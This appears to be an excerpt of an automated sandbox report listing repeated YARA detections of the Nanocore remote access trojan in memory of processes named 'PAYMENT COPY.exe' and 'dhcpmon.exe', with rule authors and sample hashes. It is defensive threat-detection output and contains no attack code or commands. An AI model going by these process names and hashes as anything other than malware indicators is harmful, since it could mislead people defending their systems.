    Source: 00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000008.00000002.278420831.0000000002460000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000F.00000002.298632979.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000002.500417911.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.500417911.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000002.499796910.00000000006B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.499796910.00000000006B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.500251784.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.500251784.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000002.499394347.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.499394347.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.500213366.0000000000700000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.500213366.0000000000700000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.500144000.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.500144000.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000002.499506090.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.499506090.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000002.499715879.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.499715879.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.504422573.00000000027A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000003.401079389.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
